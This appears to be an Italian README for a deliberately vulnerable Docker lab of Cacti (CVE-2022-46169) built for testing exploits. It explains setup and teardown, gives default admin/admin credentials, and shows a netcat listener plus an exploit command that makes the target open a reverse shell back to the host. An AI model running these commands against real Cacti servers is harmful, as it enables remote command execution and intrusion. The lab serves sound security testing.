
AVVERTENZA: Questa è un'applicazione vulnerabile per testare lo sfruttamento dell'iniezione di comandi in Cacti (CVE-2022-46169). Eseguila a tuo rischio e pericolo!
Questa è un'applicazione vulnerabile per testare l'exploit per la vulnerabilità Cacti (CVE-2022-46169).
Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente protetto e con backup (come una VM con snapshot recente e rete solo host). Non caricare questa applicazione su server esposti su Internet, poiché verranno compromessi.
DICHIARAZIONE DI NON RESPONSABILITÀ: Non mi assumo responsabilità per il modo in cui qualcuno utilizza questa applicazione. L'unico scopo di questa applicazione è quello di essere uno scenario di test per l'exploit CVE-2022-46169 e non deve essere usata in modo dannoso. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è mia responsabilità, ma delle persone che l'hanno caricata e installata.
Ecco i passaggi per configurare l'ambiente:
docker compose up -d per avviare la composizione.admin/admin.Il contenitore si chiamerà vuln-cacti.
Per smantellare l'ambiente usa il comando docker compose down.
La guida ufficiale all'installazione di Cacti si trova qui.
Una descrizione dettagliata della causa principale della vulnerabilità è disponibile qui.
Un exploit pubblico è disponibile su Exploit-DB. Per semplicità, è stato copiato nella cartella exploit/.
Per eseguirlo:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
Suggerimento: host.docker.internal viene utilizzato per raggiungere la macchina host dal contenitore (riferimento).C'è anche una voce nel repository vulhub.
Questo progetto è concesso in licenza con la licenza Unlicense - vedi il file LICENSE per i dettagli.